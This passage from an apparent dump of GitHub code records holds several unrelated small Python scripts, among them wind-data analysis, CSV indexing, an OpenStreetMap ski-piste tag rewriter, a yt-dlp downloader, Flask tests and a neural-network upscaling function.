['Sofia, Bulgaria', 42.6977028, 23.3217359]\r\n lat = city_coords[1]\r\n lon = city_coords[2]\r\n city = Point(lat, lon)\r\n years = period\r\n days_in_dev = 30\r\n delta_var = 0\r\n\r\n # ----WIND SPEED----VARIABLES\r\n\r\n windspd = []\r\n period_list = []\r\n vals_list_all_y = []\r\n keys_list = []\r\n vals_list = []\r\n count = 0\r\n season_list = ['ssn_1', 'ssn_2', 'ssn_3', 'ssn_4', 'ssn_5', 'ssn_6', 'ssn_7', 'ssn_8', 'ssn_9', 'ssn_10', 'ssn_11',\r\n 'ssn_12']\r\n season_val_list = [[], [], [], [], [], [], [], [], [], [], [], []]\r\n season_quant_list: list[int | Any] = []\r\n season_month_list = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September',\r\n 'October',\r\n 'November', 'December']\r\n\r\n # -----WIND TEMP AND DIR----VARIABLES\r\n\r\n highest_vals_n_days_in_year = []\r\n highest_vals_collection = []\r\n\r\n # SET TIME PERIOD\r\n\r\n today = datetime.now()\r\n first_year = today.year - years\r\n firstday_of_period = datetime(first_year, 1, 1)\r\n delta = timedelta(days=(365 * 1))\r\n\r\n for i in range(1, years + 1):\r\n\r\n if i == 1:\r\n start = firstday_of_period\r\n end = firstday_of_period + delta\r\n else:\r\n start = firstday_of_period + ((i - 1) * delta)\r\n end = start + delta\r\n\r\n # Get daily data for 2018\r\n data = Daily(city, start, end)\r\n data = data.fetch()\r\n\r\n # WIND DATA TO LIST\r\n\r\n wspd_list = Series.tolist(data.wspd)\r\n # print(wspd_list)\r\n # print(len(wspd_list))\r\n wpgt_list = Series.tolist(data.wpgt)\r\n # print(wpgt_list)\r\n wdir_list = Series.tolist(data.wdir)\r\n # print(wdir_list)\r\n wpgt_list = Series.tolist(data.wpgt)\r\n # print(pdgt_list)\r\n tavg_list = Series.tolist(data.tavg)\r\n # print(tavg_list)\r\n\r\n # N DAYS WITH MAX WIND SPEED FOR THE YEAR\r\n\r\n help_list = []\r\n if i == 1:\r\n max_wspd_days = []\r\n mx = 0\r\n mx_minus_any = 0\r\n n_windy_days = 5\r\n\r\n mx = max(wspd_list)\r\n\r\n for k in range(n_windy_days):\r\n\r\n if mx in wspd_list:\r\n ix = wspd_list.index(mx)\r\n max_wspd_days.append(mx)\r\n max_wspd_days.append(ix)\r\n highest_vals_n_days_in_year = []\r\n highest_vals_n_days_in_year.append('Wind speed: ')\r\n highest_vals_n_days_in_year.append(mx)\r\n highest_vals_n_days_in_year.append('Year day: ')\r\n highest_vals_n_days_in_year.append(ix)\r\n highest_vals_n_days_in_year.append('Wind dir: ')\r\n highest_vals_n_days_in_year.append(wdir_list[ix])\r\n highest_vals_n_days_in_year.append('Temperature: ')\r\n highest_vals_n_days_in_year.append(tavg_list[ix])\r\n highest_vals_collection.append(highest_vals_n_days_in_year)\r\n\r\n help_list: list[int | Any] = []\r\n\r\n for j in range(len(wspd_list)):\r\n\r\n mx_minus_any = mx - wspd_list[j]\r\n if mx_minus_any > 0:\r\n help_list.append(mx_minus_any)\r\n else:\r\n pass\r\n\r\n mx_minus_any = min(help_list)\r\n mx = mx - mx_minus_any\r\n # print(highest_vals_collection)\r\n\r\n # print(max_wspd_days)\r\n\r\n # ZIP KEYS (WIND SPEED) WITH VALUES (DAY OF YEAR)\r\n\r\n keys_list = []\r\n vals_list = []\r\n for keyval in max_wspd_days:\r\n count += 1\r\n if count % 2 != 0:\r\n keys_list.append(keyval)\r\n elif count % 2 == 0:\r\n vals_list.append(keyval)\r\n\r\n max_wspd_days_dict = dict(zip(keys_list, vals_list))\r\n # print(max_wspd_days_dict)\r\n # print(keys_list)\r\n # print(vals_list)\r\n\r\n # TEMPERATURE AND DIRECTION FOR THE MAX SPEED DAYS\r\n\r\n # Deep-freeze: < - 15°C;\r\n # Freeze: - 15°C to 0°C\r\n # Cold: 0°C to 8.lists°C;\r\n # Cool: 8.lists°C to 15°C;\r\n # Room: 15°C to 25°C.\r\n # Warm: 25°C to 32°C.\r\n # Hot: 32° to 40°C\r\n # Excessive heat: > 40°\r\n\r\n temp_ranges = ['Deep-freeze', 'Freeze', 'Cold', 'Cool', 'Optimal', 'Warm', 'Hot', 'Excessive heat']\r\n temp_range_values = [0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n for o in range(years * n_windy_days):\r\n if highest_vals_collection[o][7] <= -15:\r\n temp_range_values[0] += 1\r\n elif -15 < highest_vals_collection[o][7] <= 0:\r\n temp_range_values[1] += 1\r\n elif 0 < highest_vals_collection[o][7] <= 8:\r\n temp_range_values[2] += 1\r\n elif 8 < highest_vals_collection[o][7] <= 15:\r\n temp_range_values[3] += 1\r\n elif 15 < highest_vals_collection[o][7] <= 25:\r\n temp_range_values[4] += 1\r\n elif 25 < highest_vals_collection[o][7] <= 32:\r\n temp_range_values[5] += 1\r\n elif 32 < highest_vals_collection[o][7] <= 40:\r\n temp_range_values[6] += 1\r\n elif highest_vals_collection[o][7] > 40:\r\n temp_range_values[7] += 1\r\n\r\n # DISTRIBUTION OF WINDY DAYS IN MONTHS\r\n\r\n delta_n_years = (end - start) * years\r\n delta_1_8 = delta_n_years.days / (12 * years)\r\n # print(delta_1_8)\r\n\r\n for per in range(12):\r\n\r\n if per == 0:\r\n period_list = [per, per + int(delta_1_8)]\r\n else:\r\n period_list.append(int((per * delta_1_8) + delta_1_8))\r\n # print(period_list)\r\n\r\n for wd in range(len(vals_list)):\r\n val_check = vals_list[wd]\r\n if period_list[per] <= val_check < period_list[per + 1]:\r\n season_val_list[per].append(val_check)\r\n\r\n cnt = 0\r\n for m in season_val_list:\r\n mm = len(season_val_list[cnt])\r\n season_quant_list.append(mm)\r\n cnt += 1\r\n\r\n broi = 0\r\n w = 0;\r\n sp = 0;\r\n su = 0;\r\n a = 0\r\n wdays_per_season_list = []\r\n for wdd in vals_list:\r\n\r\n if wdd >= 355 or wdd < 80:\r\n w += 1\r\n elif 80 <= wdd < 172:\r\n sp += 1\r\n elif 172 <= wdd < 265:\r\n su += 1\r\n elif 265 <= wdd < 354:\r\n a += 1\r\n broi += 1\r\n\r\n season_str_list = ['Winter', 'Spring', 'Summer', 'Autumn']\r\n wdays_per_season_list = [w, sp, su, a]\r\n\r\n # 1 MONTH AND 1 SEASON\r\n\r\n max_WD_month = max(season_quant_list)\r\n max_WD_season = max(wdays_per_season_list)\r\n max_WD_M_index = season_quant_list.index(max_WD_month)\r\n max_WD_S_index = wdays_per_season_list.index(max_WD_season)\r\n # print(max_WD_M_index)\r\n # print(max_WD_S_index)\r\n\r\n month = season_month_list[max_WD_M_index]\r\n season = season_str_list[max_WD_S_index]\r\n\r\n if city_coords[1] >= 0:\r\n hemisphere = 'Northern Hemisphere'\r\n else:\r\n hemisphere = 'Southern Hemisphere'\r\n\r\n # SECOND AND THIRD WINDY MONTHS\r\n\r\n se_qu_li = season_quant_list[:]\r\n m_mx = max(se_qu_li)\r\n windy_months = 5\r\n h_list = []\r\n windy_months_list = []\r\n\r\n # print(se_qu_li)\r\n\r\n for z in range(windy_months):\r\n if m_mx in se_qu_li:\r\n ii = se_qu_li.index(m_mx)\r\n windy_months_list.append(m_mx)\r\n windy_months_list.append(ii)\r\n se_qu_li[ii] = 0\r\n h_list: list[int | Any] = []\r\n\r\n for w in range(len(se_qu_li)):\r\n\r\n mx_minus_any = m_mx - se_qu_li[w]\r\n if mx_minus_any >= 0:\r\n h_list.append(mx_minus_any)\r\n else:\r\n pass\r\n\r\n mx_minus_any = min(h_list)\r\n m_mx = m_mx - mx_minus_any\r\n # print(season_quant_list)\r\n # print(se_qu_li)\r\n # print(windy_months_list)\r\n\r\n # NAMES OF OTHER WINDY MONTHS\r\n\r\n oth_months_list = []\r\n oth_speed_list = []\r\n\r\n for md in range(len(windy_months_list)):\r\n if md == 0 or md == 1:\r\n continue\r\n elif md > 2 and md % 2 != 0:\r\n ind = windy_months_list[md]\r\n oth_months_list.append(season_month_list[ind])\r\n oth_speed_list.append(season_quant_list[ind])\r\n else:\r\n continue\r\n\r\n # print(oth_months_list)\r\n oth_months_list_alltoend = oth_months_list[:-1]\r\n omla = str(oth_months_list_alltoend)\r\n omla = omla.replace(\"[\", \"\")\r\n omla = omla.replace(\"]\", \"\")\r\n omla = omla.replace(\"'\", \"\")\r\n # print(omla)\r\n oth_months_list_end = oth_months_list[-1]\r\n # print(oth_months_list_end)\r\n month_keys = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October',\r\n 'November', 'December']\r\n month_values = season_quant_list\r\n month_quant_dict = {month_keys[i]: month_values[i] for i in range(len(month_keys))}\r\n\r\n season_keys = ['Winter', 'Spring', 'Summer', 'Fall']\r\n season_values = wdays_per_season_list\r\n season_quant_dict = {season_keys[i]: season_values[i] for i in range(len(season_keys))}\r\n\r\n print(f\"WINDS:\\n\")\r\n # print(f'Maximum speed {n_windy_days * years} windy days in the last {years} year (day number from the start of the year): \\n {vals_list}\\n')\r\n # print(f'List of year days separating averaged months {chr(8776)} {delta_1_8:.3f} days: \\n {period_list}\\n')\r\n # print(f'List of most windy days distributed by month in the last {years} years starting from January: \\n {season_val_list}\\n')\r\n print(\r\n f'Number of {n_windy_days * years} high speed windy days for a period of {years} years distributed by month: \\n {month_quant_dict}\\n')\r\n print(\r\n f'Number of {n_windy_days * years} high speed windy days for a period of {years} years distributed by season: \\n {season_quant_dict}\\n')\r\n print(f'The maximum wind speed for the {years} years period is {max(wspd_list)} km/h\\n')\r\n print(\r\n f'The most windy season for the {years} years period is the {season} ({hemisphere}) and the most windy month is {month}')\r\n print(f'Other months with high wind speed are {omla} and {oth_months_list_end}\\n')\r\n\r\n print(\r\n f'In {round(((temp_range_values[0] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[0]}')\r\n print(\r\n f'In {round(((temp_range_values[1] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[1]}')\r\n print(\r\n f'In {round(((temp_range_values[2] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[2]}')\r\n print(\r\n f'In {round(((temp_range_values[3] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[3]}')\r\n print(\r\n f'In {round(((temp_range_values[4] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[4]}')\r\n print(\r\n f'In {round(((temp_range_values[5] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[5]}')\r\n print(\r\n f'In {round(((temp_range_values[6] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[6]}')\r\n print(\r\n f'In {round(((temp_range_values[7] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[7]}\\n')\r\n\r\n # Wind direction in the windiest days?\r\n # Temperature in the windiest days?\r\n # Wind peak gust compared to the windiest days and windiest direction?\r\n # Matrix:\r\n # wind speed - wind gust - wind direction - temperature (extremums for all values)\r\n # wind speed 23 543 65 234\r\n # wind gust .. ... .. ...\r\n # direction 54 ... 11 ...\r\n # temperature .. ... .. ...\r\n","repo_name":"kliment-radoev/Arch-AI","sub_path":"wind.py","file_name":"wind.py","file_ext":"py","file_size_in_byte":12292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34949659610","text":"import csv\n\n# Path to your original CSV file\ninput_csv_path = 'english_only_memes.csv'\n# Path to the new CSV file with index\noutput_csv_path = 'english_only_memes_indexed.csv'\n\n# Open the original CSV file and a new file to write to\nwith open(input_csv_path, mode='r', newline='', encoding='utf-8') as infile, \\\n open(output_csv_path, mode='w', newline='', encoding='utf-8') as outfile:\n \n # Create CSV reader and writer\n reader = csv.reader(infile)\n writer = csv.writer(outfile)\n\n # Read the header from the original file and write to the new file\n header = next(reader)\n # Add the 'index' field to the header\n header.append('index')\n writer.writerow(header)\n\n # Add an index to each row of the CSV\n for index, row in enumerate(reader):\n # Append the index to the current row\n row.append(str(index))\n # Write the row to the new file\n writer.writerow(row)\n\nprint(f\"Indexed CSV created at: {output_csv_path}\")\n","repo_name":"CSCI4100U/mobile-group-project-2023-straw-hats","sub_path":"final_project/lib/dbScripts/addIndex.py","file_name":"addIndex.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19295400985","text":"for i in range(10):\n print(i)\n\nprint(\"******************************\")\nfor i in 'Hola Mundo!':\n print(i)\n\nprint(\"******************************\")\ndef contador(n):\n c = 0\n for i in range(n):\n c += 1\n return c\n\nprint(contador(10))\n\nprint(\"******************************\")\ndef sumatoria(numeros):\n acum = 0\n for n in numeros:\n acum += n\n return print(acum)\n\nsumatoria([1,2,3,4,5])\n\nprint(\"******************************\")\ndef tabla_multiplicar(numero):\n \"Imprime la tabla de multiplicar\"\n for indice in [1,2,3,4,5,6,7,8,9,10]:\n print(f\"{numero} * {indice} = {numero * indice}\")\n \ntabla_multiplicar(2)","repo_name":"dkippes/Python-Practicas","sub_path":"Introduccion a Python/ciclo_for.py","file_name":"ciclo_for.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25399979387","text":"#!/usr/bin/env python3\nimport requests\nimport os\n\ndef imageUploader(image):\n \n # URL images will be posted to\n url= \"http://localhost/upload/\" \n \n # Open file as binary\n with open(image,\"rb\") as image:\n \n # Post image\n r= requests.post(url, files={\"file\":image})\n\nif __name__==\"__main__\":\n for file in os.listdir(\"/home/{}/supplier-data/images/\".format(os.environ.get('USER'))):\n \n # Split filenam and extension\n filename, fileExt = os.path.splitext(\"/home/{}/supplier-data/images/\".format(os.environ.get('USER'))+file)\n \n # Check if file is jpeg and upload it\n if fileExt == \".jpeg\":\n imageUploader(filename+fileExt)\n","repo_name":"AureliusAtilius/Automate-Updating-Catalog","sub_path":"supplier_image_upload.py","file_name":"supplier_image_upload.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72515233442","text":"# tests/__init__.py\n\nimport os\nimport unittest\nfrom app import create_app, db\n\nclass BaseTestCase(unittest.TestCase):\n def setUp(self):\n # Set up the test app\n self.app = create_app()\n self.app.config.from_pyfile('../config.py')\n self.client = self.app.test_client()\n\n # Set up the test database\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zombimann/distributed-legislative-system","sub_path":"user_service/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71794709282","text":"\nimport random\nimport numpy as np\n\ndef upscale_rnn(original_network, fraction_intrinsic, neuron_density=None,\\\n return_mask=False, intrinsic_sparsity=0.9, extrinsic_sparsity=0.2,\\\n allow_self_conns=True):\n \"\"\"\n This method was adapted from https://github.com/AlGoulas/bio2art.\n\n Generate scaled_network from a biological neural network (connectome).\n This operation allows the contruction of artiificial neural networks\n with recurrent matrices that obey the topology and weight strength\n contraints of a biological neural network.\n\n Input\n -----\n original_network: (N,N) ndarray\n If the network is directed, rows should represent source regions, and\n columns target regions.\n\n neuron_density: (N,) ndarray, default None\n N corresponds the number of brain regions in original_network.\n Each entry of neuron_density[i] denotes the number of neurons in region\n i. NOTE: if None (default) then one neuron will be assigned to each\n region will be assigned one.\n\n fraction_intrinsic: float (0 1]\n Percentage of the strength of the outgoing connections of a region to\n be used as the total strength of the intrinsic weights. If None, and\n self connections exist in original_network (i.e., the diagonal is\n different from zero), then self-connections are used as the total\n strength of the intrinsic weights.\n\n extrinsic_sparsity: float (0 1], default 0.2\n The percentage of all possible target neurons for each source neuron\n to form connections with.\n Note that at least 1 neuron will function as target in case that the\n resulting percentage is <1.\n This parameter can be used to make the sparisty of scaled_network vary\n around the density dictated by the actual biological connectomes.\n Note that this parameter is meaningful only if at least one region\n has more than 1 neuron, that is, for some i, neuron_density[i]>1.\n\n intrinsic_sparsity: float (0 1], default 1.\n Same as extrinsic_sparsity, but for the within-region/intrinsic\n connections.\n\n allow_self_conn: bool, default True\n Specify if the diagonal entries (denoting self-to-self neuron\n connections) should be kept of or not.\n\n Output\n ------\n original_network: ndrarray of shape (N,N)\n The actual biological neural network that was used, with no\n modificiations/scaling (see data_name for N)\n\n scaled_network: ndarray of shape (M,M)\n The rescaled neural network.\n (M is bound to the parameter neuron_density)\n\n region_neuron_ids: list of lists of int\n List of lists for tracking the neurons of the scaled_network network.\n region_neuron_ids[1] contains a list with integers that denote the\n neurons of region 1 in scaled_network as\n scaled_network[region_neuron_ids[1], region_neuron_ids[1]]\n\n \"\"\"\n # if neuron_density is not specified then populate each region with 1\n # neuron\n if neuron_density is None:\n neuron_density = np.ones((original_network.shape[0]), dtype=int)\n\n n_neurons = np.sum(neuron_density).astype(int) # total number of neurons\n\n if(neuron_density.shape[0] != original_network.shape[0]):\n print(f'Size of neuron_density must be equal to the number of brain \\\n regions in connectome:{original_network.shape[0]}')\n return\n\n # list of neuron ids per brain region\n sections = [np.sum(neuron_density[:i]).astype(int) for i in range(1, len(neuron_density))]\n neuron_ids_per_roi = np.split(np.arange(n_neurons), sections)\n\n # sum of outgoing weights for each region - used for calculation of\n # intrinsic and extrinsic weights\n out_strength = np.sum(original_network, axis=1)\n\n # initialize the neuron to neuron connectivity matrix\n scaled_network = np.zeros((n_neurons, n_neurons))\n\n if return_mask: mask = np.zeros((n_neurons, n_neurons)).astype(int)\n\n # start populating the neuron-toneuron connectivity matrix\n # by region\n for source_roi in range(original_network.shape[0]):\n\n # intrinsic connectivity\n source_neurons = neuron_ids_per_roi[source_roi]\n\n connected = False\n while not connected:\n intrinsic_conn = np.vstack([np.random.binomial(1, intrinsic_sparsity, len(source_neurons)) for _ in source_neurons]).astype(int)\n if np.sum(intrinsic_conn) > 0:\n connected = True\n\n if fraction_intrinsic is None and original_network[source_roi,source_roi] > 0:\n intrinsic_wei = original_network[source_roi,source_roi]/np.sum(intrinsic_conn)\n else:\n intrinsic_wei = (fraction_intrinsic*out_strength[source_roi])/np.sum(intrinsic_conn)\n scaled_network[np.ix_(source_neurons, source_neurons)] = intrinsic_conn * intrinsic_wei\n\n if return_mask: mask[np.ix_(source_neurons, source_neurons)] = 1\n\n # extrinsic connectivity\n target_rois = np.nonzero(original_network[source_roi,:] > 0)[0]\n for target_roi in target_rois:\n\n if target_roi != source_roi:\n target_neurons = neuron_ids_per_roi[target_roi]\n\n connected = False\n while not connected:\n extrinsic_conn = np.vstack([np.random.binomial(1, extrinsic_sparsity, len(target_neurons)) for _ in source_neurons])\n if np.sum(extrinsic_conn) > 0:\n connected = True\n\n extrinsic_wei = out_strength[source_roi]/np.sum(extrinsic_conn)\n scaled_network[np.ix_(source_neurons, target_neurons)] = extrinsic_conn * extrinsic_wei\n\n if return_mask: mask[np.ix_(source_neurons, target_neurons)] = 1\n\n # delete self-connections\n if not allow_self_conns: np.fill_diagonal(scaled_network, 0)\n\n if return_mask:\n return neuron_ids_per_roi, scaled_network, mask\n else:\n return neuron_ids_per_roi, scaled_network\n","repo_name":"estefanysuarez/rnns","sub_path":"rnns/connectivity.py","file_name":"connectivity.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22060234160","text":"class DbStatuses:\n wip: str = \"WIP\"\n init: str = \"INIT\"\n in_progress: str = \"IN PROGRESS\"\n pending_rev: str = \"PENDING-REVIEW\"\n tweak: str = \"TWEAK\"\n approved_internal: str = \"APPROVED_INT\"\n approved_client: str = \"APPROVED_CLIENT\"\n approved_temp: str = \"APPROVED_TEMP\"\n approved_tech: str = \"APPROVED_TECH\"\n\n def list_all(self):\n list_all_statuses = [self.wip,\n self.init,\n self.in_progress,\n self.pending_rev,\n self.tweak,\n self.approved_internal,\n self.approved_client,\n self.approved_temp,\n self.approved_tech]\n return list_all_statuses\n\nclass DbPubSlotsMethods:\n SLOTS_METHODS = {'m1': 'sf_csh',\n 'm2': 'mf_csh',\n 'm3': 'sf_geo',\n 'm4': 'geo_bake',\n 'm5': 'geo_sim',\n 'm6': 'scn_exp',\n 'm7': 'img_exp',\n 'm8': 'anm_crv',\n 'm9': 'scatter',\n 'm10': 'p_exp',\n 'm11': 'assign_exp',\n 'm12': 'cfg_scn_exp',\n 'm13': 'cfg_exp'}\n\nif __name__ == \"__main__\":\n cc = DbStatuses()\n print (str(cc.list_all()))","repo_name":"rarsith/ORIGIN_ENERVO","sub_path":"database/db_statuses.py","file_name":"db_statuses.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36437708437","text":"\"\"\"\nConverts a file from one format to another.\nThis example shows how to write objects to a file.\n\"\"\"\n\nimport osmium as o\nimport pdb\nimport sys\n\nclass TagRewrite(o.SimpleHandler):\n\n def __init__(self, writer):\n super(TagRewrite, self).__init__()\n self.writer = writer\n\n def node(self, n):\n self.writer.add_node(n)\n def way(self, o):\n self.writer.add_way(self.rewrite(o))\n def relation(self, o):\n self.writer.add_relation(self.rewrite(o))\n \n def rewrite(self, o):\n # if there are no tags we are done\n if not o.tags:\n return o\n \n # new tags should be kept in a list so that the order is preserved\n newtags = []\n \n # pyosmium is much faster writing an original osmium object than\n # a osmium.mutable.*. Therefore, keep track if the tags list was\n # actually changed.\n modified = False\n \n if 'area' in o.tags and o.tags['area'] == 'yes':\n # only write an empty set of tags\n modified = True\n elif 'ski' in o.tags and (o.tags['ski'] == 'no' or o.tags['ski'] == 'discouraged'):\n # only write an empty set of tags\n modified = True\n elif 'piste:type' in o.tags:\n if o.tags['piste:type'] not in (\"nordic\",\"downhill\",\"connection\" ,\"hike\",\"skitour\",\"sled\",\"ski_jump\",\"fatbike\",\"sleigh\" ,\"playground\",\"ski_jump_landing\",\"snow_park\"):\n newtags.append((\"piste:type\",\"other\"))\n modified = True\n else:\n newtags.append((\"piste:type\",o.tags['piste:type']))\n modified = True\n \n elif 'aerialway' in o.tags:\n if o.tags['aerialway'] not in (\"gondola\",\"chair_lift\",\"drag_lift\",\"platter\",\"t-bar\",\"magic_carpet\",\"rope_tow\",\"cable_car\",\"j-bar\",\"mixed_lift\"):\n newtags.append((\"aerialway\",\"other\"))\n modified = True\n else:\n newtags.append((\"aerialway\",o.tags['aerialway']))\n modified = True\n elif 'railway' in o.tags:\n if o.tags['railway'] in (\"funicular\",\"incline\"):\n newtags.append((\"aerialway\",\"other\"))\n modified = True\n else:\n # only write an empty set of tags\n modified = True\n \n if 'oneway' in o.tags and not 'highway' in o.tags:\n newtags.append((\"oneway\",o.tags['oneway']))\n modified = True\n \n if 'piste:oneway' in o.tags:\n newtags.append((\"oneway\",o.tags['piste:oneway']))\n newtags.append((\"piste:oneway\",o.tags['piste:oneway']))\n modified = True\n # handle access tag, only on ways\n # access handling of ways member of relations is not handled\n if 'ski' in o.tags and (o.tags['ski'] == 'no' or o.tags['ski'] == 'discouraged'): \n if 'piste:type' in o.tags and o.tags['piste:type'] in (\"nordic\",\"downhill\",\"skitour\",\"ski_jump_landing\",\"snow_park\"):\n return\n if 'foot' in o.tags and (o.tags['foot'] == 'no' or o.tags['foot'] == 'discouraged'): \n if 'piste:type' in o.tags and o.tags['piste:type'] in (\"connection\" ,\"hike\"):\n return\n if 'bicycle' in o.tags and (o.tags['bicycle'] == 'no' or o.tags['bicycle'] == 'discouraged'): \n if 'piste:type' in o.tags and o.tags['piste:type'] in (\"fatbike\" ):\n return\n \n if modified:\n # We have changed tags. Create a new object as a copy of the\n # original one with the tag list replaced.\n return o.replace(tags=newtags)\n else:\n # Nothing changed, so simply return the original object\n # and discard the tag list we just created.\n return o\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Usage: python convert.py \")\n sys.exit(-1)\n\n writer = o.SimpleWriter(sys.argv[2])\n \n TagRewrite(writer).apply_file(sys.argv[1])\n\n writer.close()\n\n\n","repo_name":"yvecai/data-opensnowmap.org","sub_path":"tools/scripts/routing_tag_transform.py","file_name":"routing_tag_transform.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"18685981551","text":"import unittest\nimport json\n\n\nfrom app import create_app\nfrom app.models import db\n\nfrom app.models.user import User\nfrom app.models.category import Category\nfrom tests.config import (\n TEST_VALID_USER,\n TEST_VALID_EMAIL,\n TEST_VALID_PASSWORD,\n\n TEST_INVALID_USER,\n TEST_INVALID_EMAIL,\n TEST_INVALID_PASSWORD,\n TEST_VALID_CATEGORY_NAME,\n TEST_INVALID_CATEGORY_NAME\n)\n\nfrom flask_jwt_extended import (\n create_access_token,\n create_refresh_token\n)\n\n\nclass TestCategory(unittest.TestCase):\n def setUp(self):\n app = create_app()\n self.client = app.test_client()\n\n db.app = app\n\n db.session.remove()\n db.drop_all()\n db.create_all()\n\n self.user = User(fullname=TEST_VALID_USER,\n email=TEST_VALID_EMAIL,\n password=TEST_VALID_PASSWORD)\n db.session.add(self.user)\n db.session.commit()\n\n with app.test_request_context():\n self.tokens = {\n \"access_token\": create_access_token(identity=self.user.email),\n \"refresh_token\": create_refresh_token(identity=self.user.email)\n }\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_create_category(self):\n\n data = {\n \"label\": TEST_VALID_CATEGORY_NAME\n }\n\n access_token = self.tokens['access_token']\n response = self.client.post('/category',\n data=json.dumps(data),\n content_type='application/json',\n headers={\n 'Authorization': f'Bearer {access_token}'}\n )\n\n self.assertEqual(response.status_code, 201)\n\n def test_get_categories_with_categories(self):\n \"\"\"\n Not empty returned array\n \"\"\"\n\n data = {\n \"label\": TEST_VALID_CATEGORY_NAME\n }\n\n access_token = self.tokens['access_token']\n response = self.client.post('/category',\n data=json.dumps(data),\n content_type='application/json',\n headers={\n 'Authorization': f'Bearer {access_token}'}\n )\n\n get_request = self.client.get('/category',\n\n content_type='application/json',\n headers={\n 'Authorization': f'Bearer {access_token}'}\n )\n\n category_representation = [\n {'id': 1, 'label': 'Compras', 'name': 'compras', 'user_id': 1}]\n response_payload = json.loads(get_request.get_data())\n\n self.assertEqual(get_request.status_code, 200)\n self.assertEqual(category_representation, response_payload)\n","repo_name":"ondoheer/expensesAPI","sub_path":"tests/protected_endpoints/test_categories.py","file_name":"test_categories.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74479740322","text":"import os,sys,subprocess,datetime,time,re\n#\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n#\na = [line.strip() for line in open(os.path.join('/home','ubuntu','youtube.txt')).readlines()]\n#\nnow = datetime.datetime.fromtimestamp(time.time()).strftime(\"%m-%d-%Y_%H:%M:%S\")\n#\nfor b in a:\n if not 'channel' in b or '/c/' in b or 'user' in b:\n subprocess.call(f'yt-dlp --write-info-json --embed-subs --embed-thumbnail --recode-video mp4 -o \"/media/Dock1/Media/Videos/Dailies/{now}/%(upload_date)s - %(title)s/%(upload_date)s - %(title)s.%(ext)s\" {b}',shell=True)\n elif 'channel' in b or '/c/' in b or 'user' in b:\n try:\n channel = re.search('channel\\/(.*)',b).group(1)\n except:\n channel = re.search('\\/c\\/(.*)',b).group(1)\n except:\n channel = re.search('\\/user\\/(.*)',b).group(1)\n subprocess.call(f'yt-dlp --write-info-json --embed-subs --embed-thumbnail --recode-video mp4 --download-archive {channel}.txt {b} -o \"/media/Dock1/Media/Videos/Channels/{channel}/%(upload_date)s - %(title)s/%(upload_date)s - %(title)s.%(ext)s\"', shell=True)\n#\nwith open(os.path.join('/home','ubuntu','youtube.txt'),'w') as c:\n c.write('')","repo_name":"devmgardner/projects_misc","sub_path":"ytdl/dlp.py","file_name":"dlp.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30513889902","text":"# Ejercicio 4\n# Una institución educativa establece un apoyo económico para sus estudiantes, \n# basado en su desempeño académico y situación socioeconómica. \n# Si el estudiante tiene un promedio mayor a 3,5 y \n# pertenece al estrato 1, 2 o 3; es merecedor de una beca equivalente \n# al 100% de su matricula. \n# Elabore un script que, al digitar el promedio y el estrato del alumno, \n# defina si la persona merece o no el auxilio económico.\n\npromedio = float(input(\"\\nDigite el promédio académico: \"))\nestrato = int(input(\"Digite el estráto del alumno: \"))\n# if promedio > 3.5 and estrato <= 3:\nif promedio > 3.5 and estrato in (1,2,3):\n print(\"\\nEl alumno merece un auxilio educativo.\\n\")\nelse:\n print(\"\\nCreemos que el alumno no merece ser apoyado.\\n\")","repo_name":"djotalorab/MisionTIC2022","sub_path":"MisionTIC_Ciclo1_python/Sesion7/7_4.py","file_name":"7_4.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73622421282","text":"import os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom database import db\nfrom app import app\nfrom models.User import User\nfrom models.Poll import Poll\nfrom models.Vote import Vote\nfrom models.VoterList import VoterList\nfrom models.Answer import Answer\nimport datetime\n\nimport random\nimport names\nimport pandas as pd\n\nAGE_MAX = 